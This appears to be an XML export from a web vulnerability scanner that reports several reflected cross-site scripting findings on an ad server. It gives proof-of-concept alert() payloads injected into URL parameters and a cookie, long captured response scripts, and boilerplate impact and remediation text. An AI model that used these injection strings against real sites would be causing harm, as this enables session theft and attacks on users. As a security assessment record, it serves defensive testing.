    The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.]]>
  • Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
  • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
  • In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.]]>
    aacc3'-alert(1)-'c6072f82363 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.]]>
    5){return null}var c=null;var b,e;for(b=d.length-1;b>=0;b--){c=d[b];e=c.nodeName;if((e=="OBJECT"||e=="IFRAME"||e=="IMG")&&c.width==a._w&&c.height==a.height){a._ob=c;break}else{if(e=="EMBED"&&((c.width==a._w&&c.height==a.height)||(c.style.width==a._w+"px"&&c.style.height==a.height+"px"))){a._ob=c;break}else{if(e=="DIV"||e=="A"){a._findUnit(c.childNodes,f);break}else{if(e=="FORM"){a._ob=c;break}}}}}return c};this.onLoad=function(){var b,c=0;a._findUnit(a.oDoc.childNodes,c);if(a._ob!==null){b=document.createElement("IMG");b.height=1;b.width=1;b.id="img"+a._id;document.body.appendChild(b);a.obj_init(a._ob);a._log("L")}};this.obj_init=function(c){this._ob=c;var b="img"+this._id;this._obi=document.getElementById(b);if(this._ob!==null){CollectiveMedia.addEvt(window,"beforeunload",this._e_b4);CollectiveMedia.addEvt(window,"blur",this._e_bl);CollectiveMedia.addEvt(window,"focus",this._e_scr);CollectiveMedia.addEvt(window,"unload",this._e_b4);CollectiveMedia.addEvt(window,"scroll",this._e_scr);CollectiveMedia.addEvt(window,"resize",this._e_scr);CollectiveMedia.addEvt(this._ob,"mouseover",this._e_in);CollectiveMedia.addEvt(this._ob,"mouseout",this._e_ou);CollectiveMedia.addEvt(this._ob,(this._ob.nodeName=="FORM"?"submit":"click"),this._e_cl);this._ps=fP(this._ob)}this._e_scr(null);this._to=window.setInterval(function(){a.checkViewTimeout()},15000)};this._e_in=function(b){if(a.ts==null){a.ts=new Date()}a._ic=a._ic+1};this._e_scr=function(c){var i,g,b,f,e,d,h=false;if(a._ob!==null&&a._ps!==null){a._ps=fP(a._ob);b=getWS();f=getXY();e=(Math.round(a._ps[1])+Math.round(a._ob.height));d=(Math.round(a._ps[0])+Math.round(a._ob.width));if((Math.round(b[1])+Math.round(f[1])>Math.round(a._ps[1]))&&(f[1]Math.round(a._ps[0]))&&(f[0]f[1]&&e<(f[1]+b[1])){i=true}if(a._ps[0]>f[0]&&d<(f[0]+b[0])){g=true}if(g&&i){if(!a.fFV){a.fFV=true;h=true}}}else{a._vt_0();if(a._vt>a._vtl){a._log("H")}}}if(h||a.nLg==0){a._log("V")}};this._vt_0=function(){if(a.tsV!=null){a.teV=new Date();var b=a.teV.getTime()-a.tsV.getTime();a.teV.setTime(b);a.tsV=null;a._vt+=Math.round(b/1000)}a._it_0()};this._it_0=function(){if(a.ts!=null){a.te=new Date();var b=a.te.getTime()-a.ts.getTime();a.te.setTime(b);a.ts=null;a._it+=Math.round(b/1000)}};this._e_ou=function(b){a._vt_0();a._log("I");a._e_scr()};this._e_b4=function(c){if(a._to!=null){window.clearInterval(a._to);a._to=null}a._vt_0();a._log("U");a.done=true;var d=new Date(),e=0,b;e=0;while(e<200){b=new Date();e=b.getTime()-d.getTime()}};this._e_cl=function(b){a._ic=a._ic+1;a._vt_0();a._log("C");a._e_scr();return true};this._e_bl=function(b){a._vt_0();a._log("B");a._e_scr()};this.checkViewTimeout=function(){if(a.tsV!=null){var b=new Date();var c=b.getTime()-a.tsV.getTime();b.setTime(c);var d=a._vt+Math.round(c/1000);if(d>=a.mxVT){a._e_b4()}else{if(d>a._vtl){a._e_bl()}}}};this.getLogData=function(b){str="tx="+a._id+";it="+(a._it)+";vt="+(a._vt)+";ic="+(a._ic)+";atf="+(a.fATF?"1":"0")+";pv="+(a.fV?"1":"0")+";fv="+(a.fFV?"1":"0")+";seq="+(a.nLg)+";et="+b+";ord="+CollectiveMedia.rand(1000000);if(!/\?$/.test(str)){str+="?"}return str};this.getLogUrl=function(b){if(b==null){b="U"}url=location.protocol+"//l.collective-media.net/log;"+a.getLogData(b);return url};this._log=function(b){if(!a.done){a.nLg++;if(a._obi){a._obi.src=a.getLogUrl(b);a._vtl=a._vt}}}}function fP(b){var c=fPX(b);var a=fPY(b);return[c,a]}function fPX(a){var b=0;if(a.offsetParent){while(1){b+=a.offsetLeft;if(!a.offsetParent){break}a=a.offsetParent}}else{if(a.x){b+=a.x}}return b}function fPY(b){var a=0;if(b.offsetParent){while(1){a+=b.offsetTop;if(!b.offsetParent){break}b=b.offsetParent}}else{if(b.y){a+=b.y}}return a}function getWS(){var a=0,b=0;if(typeof(window.innerWidth)=="number"){a=window.innerWidth;b=window.innerHeight}else{if(document.documentElement&&(document.documentElement.clientWidth||document.documentElement.clientHeight)){a=document.documentElement.clientWidth;b=document.documentElement.clientHeight}else{if(document.body&&(document.body.clientWidth||document.body.clientHeight)){a=document.body.clientWidth;b=document.body.clientHeight}}}return[a,b]}function getXY(){var b=0,a=0;if(typeof(window.pageYOffset)=="number"){a=window.pageYOffset;b=window.pageXOffset}else{if(document.body&&(document.body.scrollLeft||document.body.scrollTop)){a=document.body.scrollTop;b=document.body.scrollLeft}else{if(document.documentElement&&(document.documentElement.scrollLeft||document.documentElement.scrollTop)){a=document.documentElement.scrollTop;b=document.documentElement.scrollLeft}}}return[b,a]}var CollectiveMedia={rand:function(a){return Math.floor(Math.random()*a)},appendChild:function(a,b){if(null==a.canHaveChildren||a.canHaveChildren){a.appendChild(document.createTextNode(b))}else{a.text=b}},createAndAttachAd:function(h,c,a,e,f){var g=document.getElementsByTagName("script");var b=g[g.length-1];if(b==null){return}var i=document.createElement("script");i.language="javascript";i.setAttribute("type","text/javascript");var j="document.write('');";b.parentNode.insertBefore(i,b);CollectiveMedia.appendChild(i,j);if(f){var d=new cmIV_();d._init(h,i.parentNode,a,e);return d}},addPixel:function(a){CollectiveMedia.addEvt(window,"load",function(){img=document.createElement("img");img.src=a;CollectiveMedia.appendChild(img)})},addTrackingImages:function(){CollectiveMedia.trackingImages=arguments;CollectiveMedia.addEvt(window,"load",CollectiveMedia.loadTrackingImages)},loadTrackingImages:function(){var a=CollectiveMedia.trackingImages,c="?";c+=CollectiveMedia.rand(1000000);for(var b=0;bCollectiveMedia.createAndAttachAd("idgt-14392314_1289162288","http://vulnerable.ad.partner//idgt.technewsworld/home_below?aacc3'-alert(1)-'c6072f82363=1;net=idgt;u=,idgt-14392314_1289162288,11c4bc59fd87e17,none,idgt.virtualization_l;;contx=none;dc=d;btg=idgt.virtualization_l?","0","0",false);');var __cs_c1 = 8; var __cs_c2 = "6035308"; var __cs_c3 = ""; var __cs_c4 = ""; var __cs_c5 = ""; var __cs_c6 = ""; var __cs_c10 = ""; var __cs_c15 = ""; var __cs_params = ["c1=", __cs_c1, "&c2=", __cs_c2, "&c3=", __cs_c3, "&c4=", __cs_c4, "&c5=", __cs_c5, "&c6=", __cs_c6, "&c10=", __cs_c10, "&c15=", __cs_c15].join(''); document.write(unescape("%3Cscript src='" + (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js?" + __cs_params +"'%3E%3C/script%3E")); ]]> false
    8466536411189346304 2097920 Cross-site scripting (reflected) http://a.collective-media.net High Certain
    The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

    Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

    The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.]]>
  • Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
  • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
  • In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.]]>
    78b13'-alert(1)-'b76cb8661a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.]]>
    '); document.write(''); ]]> false
    3770242526483611648 2097920 Cross-site scripting (reflected) http://a.collective-media.net High Certain
    The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

    Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

    The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.]]>
  • Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
  • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
  • In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.]]>
    d09aa'-alert(1)-'41d19aa3424 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.]]>
    5){return null}var c=null;var b,e;for(b=d.length-1;b>=0;b--){c=d[b];e=c.nodeName;if((e=="OBJECT"||e=="IFRAME"||e=="IMG")&&c.width==a._w&&c.height==a.height){a._ob=c;break}else{if(e=="EMBED"&&((c.width==a._w&&c.height==a.height)||(c.style.width==a._w+"px"&&c.style.height==a.height+"px"))){a._ob=c;break}else{if(e=="DIV"||e=="A"){a._findUnit(c.childNodes,f);break}else{if(e=="FORM"){a._ob=c;break}}}}}return c};this.onLoad=function(){var b,c=0;a._findUnit(a.oDoc.childNodes,c);if(a._ob!==null){b=document.createElement("IMG");b.height=1;b.width=1;b.id="img"+a._id;document.body.appendChild(b);a.obj_init(a._ob);a._log("L")}};this.obj_init=function(c){this._ob=c;var b="img"+this._id;this._obi=document.getElementById(b);if(this._ob!==null){CollectiveMedia.addEvt(window,"beforeunload",this._e_b4);CollectiveMedia.addEvt(window,"blur",this._e_bl);CollectiveMedia.addEvt(window,"focus",this._e_scr);CollectiveMedia.addEvt(window,"unload",this._e_b4);CollectiveMedia.addEvt(window,"scroll",this._e_scr);CollectiveMedia.addEvt(window,"resize",this._e_scr);CollectiveMedia.addEvt(this._ob,"mouseover",this._e_in);CollectiveMedia.addEvt(this._ob,"mouseout",this._e_ou);CollectiveMedia.addEvt(this._ob,(this._ob.nodeName=="FORM"?"submit":"click"),this._e_cl);this._ps=fP(this._ob)}this._e_scr(null);this._to=window.setInterval(function(){a.checkViewTimeout()},15000)};this._e_in=function(b){if(a.ts==null){a.ts=new Date()}a._ic=a._ic+1};this._e_scr=function(c){var i,g,b,f,e,d,h=false;if(a._ob!==null&&a._ps!==null){a._ps=fP(a._ob);b=getWS();f=getXY();e=(Math.round(a._ps[1])+Math.round(a._ob.height));d=(Math.round(a._ps[0])+Math.round(a._ob.width));if((Math.round(b[1])+Math.round(f[1])>Math.round(a._ps[1]))&&(f[1]Math.round(a._ps[0]))&&(f[0]f[1]&&e<(f[1]+b[1])){i=true}if(a._ps[0]>f[0]&&d<(f[0]+b[0])){g=true}if(g&&i){if(!a.fFV){a.fFV=true;h=true}}}else{a._vt_0();if(a._vt>a._vtl){a._log("H")}}}if(h||a.nLg==0){a._log("V")}};this._vt_0=function(){if(a.tsV!=null){a.teV=new Date();var b=a.teV.getTime()-a.tsV.getTime();a.teV.setTime(b);a.tsV=null;a._vt+=Math.round(b/1000)}a._it_0()};this._it_0=function(){if(a.ts!=null){a.te=new Date();var b=a.te.getTime()-a.ts.getTime();a.te.setTime(b);a.ts=null;a._it+=Math.round(b/1000)}};this._e_ou=function(b){a._vt_0();a._log("I");a._e_scr()};this._e_b4=function(c){if(a._to!=null){window.clearInterval(a._to);a._to=null}a._vt_0();a._log("U");a.done=true;var d=new Date(),e=0,b;e=0;while(e<200){b=new Date();e=b.getTime()-d.getTime()}};this._e_cl=function(b){a._ic=a._ic+1;a._vt_0();a._log("C");a._e_scr();return true};this._e_bl=function(b){a._vt_0();a._log("B");a._e_scr()};this.checkViewTimeout=function(){if(a.tsV!=null){var b=new Date();var c=b.getTime()-a.tsV.getTime();b.setTime(c);var d=a._vt+Math.round(c/1000);if(d>=a.mxVT){a._e_b4()}else{if(d>a._vtl){a._e_bl()}}}};this.getLogData=function(b){str="tx="+a._id+";it="+(a._it)+";vt="+(a._vt)+";ic="+(a._ic)+";atf="+(a.fATF?"1":"0")+";pv="+(a.fV?"1":"0")+";fv="+(a.fFV?"1":"0")+";seq="+(a.nLg)+";et="+b+";ord="+CollectiveMedia.rand(1000000);if(!/\?$/.test(str)){str+="?"}return str};this.getLogUrl=function(b){if(b==null){b="U"}url=location.protocol+"//l.collective-media.net/log;"+a.getLogData(b);return url};this._log=function(b){if(!a.done){a.nLg++;if(a._obi){a._obi.src=a.getLogUrl(b);a._vtl=a._vt}}}}function fP(b){var c=fPX(b);var a=fPY(b);return[c,a]}function fPX(a){var b=0;if(a.offsetParent){while(1){b+=a.offsetLeft;if(!a.offsetParent){break}a=a.offsetParent}}else{if(a.x){b+=a.x}}return b}function fPY(b){var a=0;if(b.offsetParent){while(1){a+=b.offsetTop;if(!b.offsetParent){break}b=b.offsetParent}}else{if(b.y){a+=b.y}}return a}function getWS(){var a=0,b=0;if(typeof(window.innerWidth)=="number"){a=window.innerWidth;b=window.innerHeight}else{if(document.documentElement&&(document.documentElement.clientWidth||document.documentElement.clientHeight)){a=document.documentElement.clientWidth;b=document.documentElement.clientHeight}else{if(document.body&&(document.body.clientWidth||document.body.clientHeight)){a=document.body.clientWidth;b=document.body.clientHeight}}}return[a,b]}function getXY(){var b=0,a=0;if(typeof(window.pageYOffset)=="number"){a=window.pageYOffset;b=window.pageXOffset}else{if(document.body&&(document.body.scrollLeft||document.body.scrollTop)){a=document.body.scrollTop;b=document.body.scrollLeft}else{if(document.documentElement&&(document.documentElement.scrollLeft||document.documentElement.scrollTop)){a=document.documentElement.scrollTop;b=document.documentElement.scrollLeft}}}return[b,a]}var CollectiveMedia={rand:function(a){return Math.floor(Math.random()*a)},appendChild:function(a,b){if(null==a.canHaveChildren||a.canHaveChildren){a.appendChild(document.createTextNode(b))}else{a.text=b}},createAndAttachAd:function(h,c,a,e,f){var g=document.getElementsByTagName("script");var b=g[g.length-1];if(b==null){return}var i=document.createElement("script");i.language="javascript";i.setAttribute("type","text/javascript");var j="document.write('');";b.parentNode.insertBefore(i,b);CollectiveMedia.appendChild(i,j);if(f){var d=new cmIV_();d._init(h,i.parentNode,a,e);return d}},addPixel:function(a){CollectiveMedia.addEvt(window,"load",function(){img=document.createElement("img");img.src=a;CollectiveMedia.appendChild(img)})},addTrackingImages:function(){CollectiveMedia.trackingImages=arguments;CollectiveMedia.addEvt(window,"load",CollectiveMedia.loadTrackingImages)},loadTrackingImages:function(){var a=CollectiveMedia.trackingImages,c="?";c+=CollectiveMedia.rand(1000000);for(var b=0;bCollectiveMedia.createAndAttachAd("idgt-89195851_1289162297","http://vulnerable.ad.partner//idgt.technewsworld/home_belowd09aa'-alert(1)-'41d19aa3424;net=idgt;u=,idgt-89195851_1289162297,11c4bc59fd87e17,none,idgt.virtualization_l;;contx=none;dc=d;btg=idgt.virtualization_l?","0","0",false);');var __cs_c1 = 8; var __cs_c2 = "6035308"; var __cs_c3 = ""; var __cs_c4 = ""; var __cs_c5 = ""; var __cs_c6 = ""; var __cs_c10 = ""; var __cs_c15 = ""; var __cs_params = ["c1=", __cs_c1, "&c2=", __cs_c2, "&c3=", __cs_c3, "&c4=", __cs_c4, "&c5=", __cs_c5, "&c6=", __cs_c6, "&c10=", __cs_c10, "&c15=", __cs_c15].join(''); document.write(unescape("%3Cscript src='" + (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js?" + __cs_params +"'%3E%3C/script%3E")); ]]> false
    1014340655845699584 2097920 Cross-site scripting (reflected) http://a.collective-media.net Information Certain
    The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

    Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

    The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.]]>
  • Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
  • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
  • In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.]]>
    7cfe1'%3balert(1)//942a0687331 was submitted in the cli cookie. This input was echoed as 7cfe1';alert(1)//942a0687331 in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

    Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.]]>
    5){return null}var c=null;var b,e;for(b=d.length-1;b>=0;b--){c=d[b];e=c.nodeName;if((e=="OBJECT"||e=="IFRAME"||e=="IMG")&&c.width==a._w&&c.height==a.height){a._ob=c;break}else{if(e=="EMBED"&&((c.width==a._w&&c.height==a.height)||(c.style.width==a._w+"px"&&c.style.height==a.height+"px"))){a._ob=c;break}else{if(e=="DIV"||e=="A"){a._findUnit(c.childNodes,f);break}else{if(e=="FORM"){a._ob=c;break}}}}}return c};this.onLoad=function(){var b,c=0;a._findUnit(a.oDoc.childNodes,c);if(a._ob!==null){b=document.createElement("IMG");b.height=1;b.width=1;b.id="img"+a._id;document.body.appendChild(b);a.obj_init(a._ob);a._log("L")}};this.obj_init=function(c){this._ob=c;var b="img"+this._id;this._obi=document.getElementById(b);if(this._ob!==null){CollectiveMedia.addEvt(window,"beforeunload",this._e_b4);CollectiveMedia.addEvt(window,"blur",this._e_bl);CollectiveMedia.addEvt(window,"focus",this._e_scr);CollectiveMedia.addEvt(window,"unload",this._e_b4);CollectiveMedia.addEvt(window,"scroll",this._e_scr);CollectiveMedia.addEvt(window,"resize",this._e_scr);CollectiveMedia.addEvt(this._ob,"mouseover",this._e_in);CollectiveMedia.addEvt(this._ob,"mouseout",this._e_ou);CollectiveMedia.addEvt(this._ob,(this._ob.nodeName=="FORM"?"submit":"click"),this._e_cl);this._ps=fP(this._ob)}this._e_scr(null);this._to=window.setInterval(function(){a.checkViewTimeout()},15000)};this._e_in=function(b){if(a.ts==null){a.ts=new Date()}a._ic=a._ic+1};this._e_scr=function(c){var i,g,b,f,e,d,h=false;if(a._ob!==null&&a._ps!==null){a._ps=fP(a._ob);b=getWS();f=getXY();e=(Math.round(a._ps[1])+Math.round(a._ob.height));d=(Math.round(a._ps[0])+Math.round(a._ob.width));if((Math.round(b[1])+Math.round(f[1])>Math.round(a._ps[1]))&&(f[1]Math.round(a._ps[0]))&&(f[0]f[1]&&e<(f[1]+b[1])){i=true}if(a._ps[0]>f[0]&&d<(f[0]+b[0])){g=true}if(g&&i){if(!a.fFV){a.fFV=true;h=true}}}else{a._vt_0();if(a._vt>a._vtl){a._log("H")}}}if(h||a.nLg==0){a._log("V")}};this._vt_0=function(){if(a.tsV!=null){a.teV=new Date();var b=a.teV.getTime()-a.tsV.getTime();a.teV.setTime(b);a.tsV=null;a._vt+=Math.round(b/1000)}a._it_0()};this._it_0=function(){if(a.ts!=null){a.te=new Date();var b=a.te.getTime()-a.ts.getTime();a.te.setTime(b);a.ts=null;a._it+=Math.round(b/1000)}};this._e_ou=function(b){a._vt_0();a._log("I");a._e_scr()};this._e_b4=function(c){if(a._to!=null){window.clearInterval(a._to);a._to=null}a._vt_0();a._log("U");a.done=true;var d=new Date(),e=0,b;e=0;while(e<200){b=new Date();e=b.getTime()-d.getTime()}};this._e_cl=function(b){a._ic=a._ic+1;a._vt_0();a._log("C");a._e_scr();return true};this._e_bl=function(b){a._vt_0();a._log("B");a._e_scr()};this.checkViewTimeout=function(){if(a.tsV!=null){var b=new Date();var c=b.getTime()-a.tsV.getTime();b.setTime(c);var d=a._vt+Math.round(c/1000);if(d>=a.mxVT){a._e_b4()}else{if(d>a._vtl){a._e_bl()}}}};this.getLogData=function(b){str="tx="+a._id+";it="+(a._it)+";vt="+(a._vt)+";ic="+(a._ic)+";atf="+(a.fATF?"1":"0")+";pv="+(a.fV?"1":"0")+";fv="+(a.fFV?"1":"0")+";seq="+(a.nLg)+";et="+b+";ord="+CollectiveMedia.rand(1000000);if(!/\?$/.test(str)){str+="?"}return str};this.getLogUrl=function(b){if(b==null){b="U"}url=location.protocol+"//l.collective-media.net/log;"+a.getLogData(b);return url};this._log=function(b){if(!a.done){a.nLg++;if(a._obi){a._obi.src=a.getLogUrl(b);a._vtl=a._vt}}}}function fP(b){var c=fPX(b);var a=fPY(b);return[c,a]}function fPX(a){var b=0;if(a.offsetParent){while(1){b+=a.offsetLeft;if(!a.offsetParent){break}a=a.offsetParent}}else{if(a.x){b+=a.x}}return b}function fPY(b){var a=0;if(b.offsetParent){while(1){a+=b.offsetTop;if(!b.offsetParent){break}b=b.offsetParent}}else{if(b.y){a+=b.y}}return a}function getWS(){var a=0,b=0;if(typeof(window.innerWidth)=="number"){a=window.innerWidth;b=window.innerHeight}else{if(document.documentElement&&(document.documentElement.clientWidth||document.documentElement.clientHeight)){a=document.documentElement.clientWidth;b=document.documentElement.clientHeight}else{if(document.body&&(document.body.clientWidth||document.body.clientHeight)){a=document.body.clientWidth;b=document.body.clientHeight}}}return[a,b]}function getXY(){var b=0,a=0;if(typeof(window.pageYOffset)=="number"){a=window.pageYOffset;b=window.pageXOffset}else{if(document.body&&(document.body.scrollLeft||document.body.scrollTop)){a=document.body.scrollTop;b=document.body.scrollLeft}else{if(document.documentElement&&(document.documentElement.scrollLeft||document.documentElement.scrollTop)){a=document.documentElement.scrollTop;b=document.documentElement.scrollLeft}}}return[b,a]}var CollectiveMedia={rand:function(a){return Math.floor(Math.random()*a)},appendChild:function(a,b){if(null==a.canHaveChildren||a.canHaveChildren){a.appendChild(document.createTextNode(b))}else{a.text=b}},createAndAttachAd:function(h,c,a,e,f){var g=document.getElementsByTagName("script");var b=g[g.length-1];if(b==null){return}var i=document.createElement("script");i.language="javascript";i.setAttribute("type","text/javascript");var j="document.write('');";b.parentNode.insertBefore(i,b);CollectiveMedia.appendChild(i,j);if(f){var d=new cmIV_();d._init(h,i.parentNode,a,e);return d}},addPixel:function(a){CollectiveMedia.addEvt(window,"load",function(){img=document.createElement("img");img.src=a;CollectiveMedia.appendChild(img)})},addTrackingImages:function(){CollectiveMedia.trackingImages=arguments;CollectiveMedia.addEvt(window,"load",CollectiveMedia.loadTrackingImages)},loadTrackingImages:function(){var a=CollectiveMedia.trackingImages,c="?";c+=CollectiveMedia.rand(1000000);for(var b=0;bCollectiveMedia.createAndAttachAd("idgt-35079628_1289162277","http://vulnerable.ad.partner//idgt.technewsworld/home_above;net=idgt;u=,idgt-35079628_1289162277,11c4bc59fd87e177cfe1';alert(1)//942a0687331,none,;;contx=none;dc=d;btg=?","0","0",false);');var __cs_c1 = 8; var __cs_c2 = "6035308"; var __cs_c3 = ""; var __cs_c4 = ""; var __cs_c5 = ""; var __cs_c6 = ""; var __cs_c10 = ""; var __cs_c15 = ""; var __cs_params = ["c1=", __cs_c1, "&c2=", __cs_c2, "&c3=", __cs_c3, "&c4=", __cs_c4, "&c5=", __cs_c5, "&c6=", __cs_c6, "&c10=", __cs_c10, "&c15=", __cs_c15].join(''); document.write(unescape("%3Cscript src='" + (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js?" + __cs_params +"'%3E%3C/script%3E")); ]]> false
    2128485911557578752 2097920 Cross-site scripting (reflected) http://a.collective-media.net High Certain
    The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

    Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

    The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.]]>
  • Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
  • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
  • In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.]]>
    7ce54'-alert(1)-'ccb6ed6ed46 was submitted in the sec parameter. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.]]>
